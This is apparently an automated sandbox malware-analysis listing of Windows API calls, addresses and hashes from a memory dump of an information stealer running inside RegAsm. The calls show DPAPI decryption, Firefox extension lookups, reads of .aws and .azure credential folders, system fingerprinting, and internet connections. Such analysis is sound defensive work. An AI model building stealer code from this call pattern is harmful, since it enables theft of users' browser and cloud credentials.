                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004173D0
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001B58), ref: 004173DB
                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265B7), ref: 004173EC
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417402
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417410
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00417417
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$wcslen$lstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologLibraryLoadNameOpenSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2119032056-0
                                                                                                                                                                                                                                                                  • Opcode ID: f44390ae83ec2a53febc893590c9efbd6eaa9207bc4d09a789cb7b4316684720
                                                                                                                                                                                                                                                                  • Instruction ID: b0c3368dbeba95a03800b646848d2f179c7d6e98ae7e16720a6a7a4864197866
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f44390ae83ec2a53febc893590c9efbd6eaa9207bc4d09a789cb7b4316684720
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5116D70904118BBDB20F7A2EC5ACEE7B3DAE52308710407AB501B24D2DF382A49CB69
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CrackH_prologInternetlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 503950642-0
                                                                                                                                                                                                                                                                  • Opcode ID: add383095bd194c775cbccd07c4459ef089246012b9e457cdc94c3ab7b4f97d6
                                                                                                                                                                                                                                                                  • Instruction ID: 25513c5dd13f52cf69022376d0d52a42e9839c3d89f71734454ae273deb286b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: add383095bd194c775cbccd07c4459ef089246012b9e457cdc94c3ab7b4f97d6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5115B71D00208ABCB15EFA5D806BDE7B79EF05334F20422BE425B66E0DB389A858B54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040B238
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2F9
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B315
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B002: _EH_prolog.MSVCRT ref: 0040B007
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                  • API String ID: 2813378046-3310892237
                                                                                                                                                                                                                                                                  • Opcode ID: 87ac7a6719ab82e4a12d422d037297c3c62a0b91d24161bddc916d4476618f68
                                                                                                                                                                                                                                                                  • Instruction ID: c7357e689bea5f598632d395668510103b20eed8d76ccd924dd8ffa454bfe75b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ac7a6719ab82e4a12d422d037297c3c62a0b91d24161bddc916d4476618f68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3717A70905288EADF14EBA5D946BDDBBB4AF15308F14407EE805732C2DB781B0CCBA6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040653D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065FA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 00406672
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 0040668D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004065EE, 004065F3, 0040660D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                  • API String ID: 757424748-3463377506
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C1DF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C232
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062B5
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalAlloc.KERNEL32(00000040,LY@,?,?,0040594C,00000000,?,?), ref: 004062C3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,LY@,00000000,00000000), ref: 004062D9
                                                                                                                                                                                                                                                                    • Part of subcall function 00406295: LocalFree.KERNEL32(00000000,?,?,0040594C,00000000,?,?), ref: 004062E8
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040C270
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040631B
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406333
                                                                                                                                                                                                                                                                    • Part of subcall function 004062F8: LocalFree.KERNEL32(?), ref: 00406351
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                  • String ID: $DPAPI
                                                                                                                                                                                                                                                                  • API String ID: 2477620391-1819349886
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory), ref: 004106A7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004106AE
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?), ref: 004106DC
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000), ref: 004106F8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID: Windows 11
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ,00000000), ref: 0040FBAB
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614), ref: 0040FBB2
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000,?,Windows: ), ref: 0040FBD0
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FC09,004106BB,?,?,?,00414B0F,00000000), ref: 0040FBEB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00416A68
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004134F2: _EH_prolog.MSVCRT ref: 004134F7
                                                                                                                                                                                                                                                                    • Part of subcall function 004135A1: _EH_prolog.MSVCRT ref: 004135A6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32(74DD0000,00416BAD), ref: 004177BF
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004177D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004177ED
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417804
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041781B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417832
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417849
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417860
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417877
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041788E
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178A5
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178BC
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178D3
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004178EA
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417901
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417918
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041792F
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417946
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041795D
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 00417974
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 0041798B
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179A2
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179B9
                                                                                                                                                                                                                                                                    • Part of subcall function 004177AB: GetProcAddress.KERNEL32 ref: 004179D0
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004135DE,004135DE,?,004265AB,00000000,?,00000040,00000064,0041365F,00412CF8,?,0000002C,00000064), ref: 00416C56
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00413901: _EH_prolog.MSVCRT ref: 00413906
                                                                                                                                                                                                                                                                    • Part of subcall function 0041328A: _EH_prolog.MSVCRT ref: 0041328F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416D3B
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416D57
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: _EH_prolog.MSVCRT ref: 00403B23
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BCE
                                                                                                                                                                                                                                                                    • Part of subcall function 00403B1E: StrCmpCA.SHLWAPI(?), ref: 00403BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: _EH_prolog.MSVCRT ref: 00411CC3
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416DD2), ref: 00411CE5
                                                                                                                                                                                                                                                                    • Part of subcall function 00411CBE: ExitProcess.KERNEL32 ref: 00411CF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: _EH_prolog.MSVCRT ref: 0040ED54
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED4F: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EE0C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: _EH_prolog.MSVCRT ref: 0040518F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040523A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040518A: StrCmpCA.SHLWAPI(?), ref: 00405251
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: _EH_prolog.MSVCRT ref: 004117AF
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: strtok_s.MSVCRT ref: 004117D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: StrCmpCA.SHLWAPI(00000000,00426560,?,?,?,?,00416FBB), ref: 00411807
                                                                                                                                                                                                                                                                    • Part of subcall function 004117AA: strtok_s.MSVCRT ref: 00411868
                                                                                                                                                                                                                                                                    • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: _EH_prolog.MSVCRT ref: 004166E2
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: lstrcat.KERNEL32(?,00000000), ref: 00416724
                                                                                                                                                                                                                                                                    • Part of subcall function 004166DD: lstrcat.KERNEL32(?), ref: 00416743
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: _EH_prolog.MSVCRT ref: 0041689A
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 004168BA
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,00000000), ref: 004168E0
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,\.azure\), ref: 004168FD
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 00416938
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,00000000), ref: 00416963
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: lstrcat.KERNEL32(?,\.aws\), ref: 00416980
                                                                                                                                                                                                                                                                    • Part of subcall function 00416895: memset.MSVCRT ref: 004169BB
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1955031769-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409196
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
